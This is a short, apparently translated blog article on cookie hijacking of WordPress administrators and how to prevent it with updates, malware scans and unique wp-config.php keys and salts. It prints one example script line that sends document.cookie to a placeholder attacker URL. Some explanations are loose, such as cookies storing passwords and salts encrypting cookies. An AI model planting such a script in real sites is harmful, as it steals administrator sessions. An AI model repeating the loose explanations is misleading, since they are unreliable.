Cookie hijacking, which is the theft of cookies from logged-in WordPress users, will be explained.
What are cookies?
A cookie is a mechanism that temporarily stores various information about a user accessing a site in the user’s browser for each domain (or page).
Typical information temporarily stored in a cookie includes the following
Information about whether you are logged in to the site, such as your login ID and password.
Information for access analysis
Information about the products in your shopping cart (in many cases, only the cart ID is stored in the cookie and the information about the products in the cart is stored on the server side)
etc.
If a hacker can steal the cookie’s “information about whether you are logged in to the site and your login ID password, etc.,” the hacker will be able to log in to the site.
Methods and Dangers of Cookie Hijacking
Hackers can modify and embed the following code into a WordPress site, and then have users logged in with administrator privileges execute the malicious code containing this script, which sends cookie information to an external server, allowing them to log in as well as the administrator. Thus, cookie theft increases the risk of hacking.
"https://hackers site url/?cookie=" escape ( document.cookie ) ;
In practice, this script is obfuscated or a combination of various techniques is used to transmit it.
However, there are some hurdles for hackers to run this script and take away the WordPress admin login.
1 The site must be tampered with to embed this script (or a cross-site scripting link must be stepped on).
2 The user who would run the script must be logged in as an administrator
3 WordPress cookie information is encrypted using AUTH_KEY and SECURE_AUTH_KEY in wp-config.php for each login, so getting the cookie does not guarantee login.
By strengthening these hurdles 1, 2, and 3, cookie hijacking can be prevented.
Preventing Cookie Hijacking
Plug vulnerabilities in the site
To prevent the first, you need to close vulnerabilities in WordPress itself and its theme plug-ins to prevent your site from being defaced or cross-site scripted.
The easiest and most powerful way to do this is to frequently update your WordPress theme or plugin.
Also, unused themes and plugins should be removed from the server.
Reference
5 Free WordPress Security Measures
Also, scan your site for malware that may have already been embedded in your site and remove it if found.
Free WordPress: Malware Scan & Security Plug-in [Malware and Virus Detection and Removal]
Properly encrypt cookies
To prevent #2 and #3, you should encrypt the cookie in wp-config.php so that a hacker cannot use it to log in as administrator even if the cookie is stolen.
‘AUTH_KEY’.
‘SECURE_AUTH_KEY’
‘LOGGED_IN_KEY’
‘NONCE_KEY’
‘AUTH_SALT’
‘SECURE_AUTH_SALT’
‘LOGGED_IN_SALT’
‘NONCE_SALT’
to a long, meaningless, appropriate string. This string can be found in wp-config.php
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
You can generate these automatically by accessing the salto generation service that follows the @link in {@link WordPress.org secret-key service}.
Please do not leave the default “put your unique phrase here”. Once a hacker steals a cookie, he can use this key to create a cookie that will allow him to log in as administrator as many times as he wants.
We hope this helps.
